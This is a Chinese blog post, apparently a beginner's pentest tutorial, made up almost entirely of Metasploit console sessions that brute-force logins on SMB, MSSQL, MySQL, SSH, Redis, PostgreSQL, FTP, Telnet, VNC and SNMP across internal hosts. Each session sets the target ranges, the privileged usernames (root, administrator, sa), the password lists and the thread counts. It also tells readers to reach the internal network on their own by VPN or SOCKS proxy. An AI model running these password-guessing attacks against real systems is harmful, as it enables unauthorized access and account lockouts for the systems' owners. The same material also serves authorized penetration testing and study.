论安全萌新的自我修养


MSF服务爆破

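如何进入内网请自行解决,可以使用 VPN 或 SOCKS 代理。以下各模块都是在线口令猜测:每次尝试都会在目标服务上留下一条失败登录记录(例如 Windows 安全日志中的事件 4625、sshd 的认证失败日志),对启用了锁定策略的账户还可能触发锁定。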

SMB爆破

msf5 > use auxiliary/scanner/smb/smb_login 
msf5 auxiliary(scanner/smb/smb_login) > set rhosts file:/home/yang/host.txt
rhosts => file:/home/yang/host.txt
msf5 auxiliary(scanner/smb/smb_login) > set smbuser administrator
smbuser => administrator
msf5 auxiliary(scanner/smb/smb_login) > set smbdomain .
smbdomain => .
msf5 auxiliary(scanner/smb/smb_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/smb/smb_login) > set threads 3
threads => 3
msf5 auxiliary(scanner/smb/smb_login) > set blank_passwords true 
blank_passwords => true
msf5 auxiliary(scanner/smb/smb_login) > run

Mssql 爆破

msf5 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/mssql/mssql_login 
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.3.144,73
rhosts => 192.168.3.144,73
msf5 auxiliary(scanner/mssql/mssql_login) > set use sa
use => sa
msf5 auxiliary(scanner/mssql/mssql_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/mssql/mssql_login) > set threads 3
threads => 3
msf5 auxiliary(scanner/mssql/mssql_login) > set blank_passwords true 
blank_passwords => true
msf5 auxiliary(scanner/mssql/mssql_login) > run

Mysql爆破

msf5 auxiliary(scanner/mssql/mssql_login) > use auxiliary/scanner/mysql/mysql_login 
msf5 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.3.144,73
rhosts => 192.168.3.144,73
msf5 auxiliary(scanner/mysql/mysql_login) > set username root
username => root
msf5 auxiliary(scanner/mysql/mysql_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/mysql/mysql_login) > set threads 3
threads => 3
msf5 auxiliary(scanner/mysql/mysql_login) > set blank_passwords true 
blank_passwords => true
msf5 auxiliary(scanner/mysql/mysql_login) > exploit

Linux ssh爆破

msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.3.142,144,73,130
rhosts => 192.168.3.142,144,73,130
msf5 auxiliary(scanner/ssh/ssh_login) > set username root
username => root
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/ssh/ssh_login) > set bruteforce_speed 10
bruteforce_speed => 10
msf5 auxiliary(scanner/ssh/ssh_login) > set blank_passwords true 
blank_passwords => true
msf5 auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssh/ssh_login) > exploit 

Redis爆破

msf5 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/redis/redis_login 
msf5 auxiliary(scanner/redis/redis_login) > set rhosts 192.168.3.142,144,73,130
rhosts => 192.168.3.142,144,73,130
msf5 auxiliary(scanner/redis/redis_login) > set pass
set pass_file  set password   
msf5 auxiliary(scanner/redis/redis_login) > set password admin!@#45
password => admin!@#45
msf5 auxiliary(scanner/redis/redis_login) > unset PASS_FILE 
Unsetting PASS_FILE...

Postgresql爆破

msf5 auxiliary(scanner/redis/redis_login) > use auxiliary/scanner/postgres/postgres_login 
msf5 auxiliary(scanner/postgres/postgres_login) > set rhosts file:/home/yang/host.txt
rhosts => file:/home/yang/host.txt
msf5 auxiliary(scanner/postgres/postgres_login) > set user postgres
user => postgres
msf5 auxiliary(scanner/postgres/postgres_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/postgres/postgres_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/postgres/postgres_login) > set bruteforce_speed 5
bruteforce_speed => 5
msf5 auxiliary(scanner/postgres/postgres_login) > set blank_passwords true 
blank_passwords => true
msf5 auxiliary(scanner/postgres/postgres_login) > exploit 

Ftp爆破

msf5 auxiliary(scanner/vnc/vnc_login) > use auxiliary/scanner/ftp/ftp_login 
msf5 auxiliary(scanner/ftp/ftp_login) > set rhosts 192.168.3.142,144,73,130
rhosts => 192.168.3.142,144,73,130
msf5 auxiliary(scanner/ftp/ftp_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/ftp/ftp_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/ftp/ftp_login) > set bruteforce_speed 3
bruteforce_speed => 3
msf5 auxiliary(scanner/ftp/ftp_login) > run

Telnet爆破

msf5 auxiliary(scanner/telnet/telnet_login) > set rhosts file:/home/yang/host.txt
rhosts => file:/home/yang/host.txt
msf5 auxiliary(scanner/telnet/telnet_login) > set user_file /home/yang/user.txt
user_file => /home/yang/user.txt
msf5 auxiliary(scanner/telnet/telnet_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/telnet/telnet_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/telnet/telnet_login) > set bruteforce_speed 5
bruteforce_speed => 5
msf5 auxiliary(scanner/telnet/telnet_login) > set blank_passwords true 
blank_passwords => true
msf5 auxiliary(scanner/telnet/telnet_login) > run

Vnc爆破

msf5 auxiliary(scanner/telnet/telnet_login) > use auxiliary/scanner/vnc/vnc_login 
msf5 auxiliary(scanner/vnc/vnc_login) > set password admin!@#45
password => admin!@#45
msf5 auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.3.130
rhosts => 192.168.3.130
msf5 auxiliary(scanner/vnc/vnc_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/vnc/vnc_login) > run

Snmp爆破

msf5 auxiliary(scanner/ftp/ftp_login) > use auxiliary/scanner/snmp/snmp_login 
msf5 auxiliary(scanner/snmp/snmp_login) > set rhosts 192.168.3.142,144,73,130
rhosts => 192.168.3.142,144,73,130
msf5 auxiliary(scanner/snmp/snmp_login) > unset PASS_FILE 
Unsetting PASS_FILE...
msf5 auxiliary(scanner/snmp/snmp_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/snmp/snmp_login) > set password public
password => public
msf5 auxiliary(scanner/snmp/snmp_login) > set bruteforce_speed 3
bruteforce_speed => 3
msf5 auxiliary(scanner/snmp/snmp_login) > run
posted on 2020-12-22 22:24  Yangsir34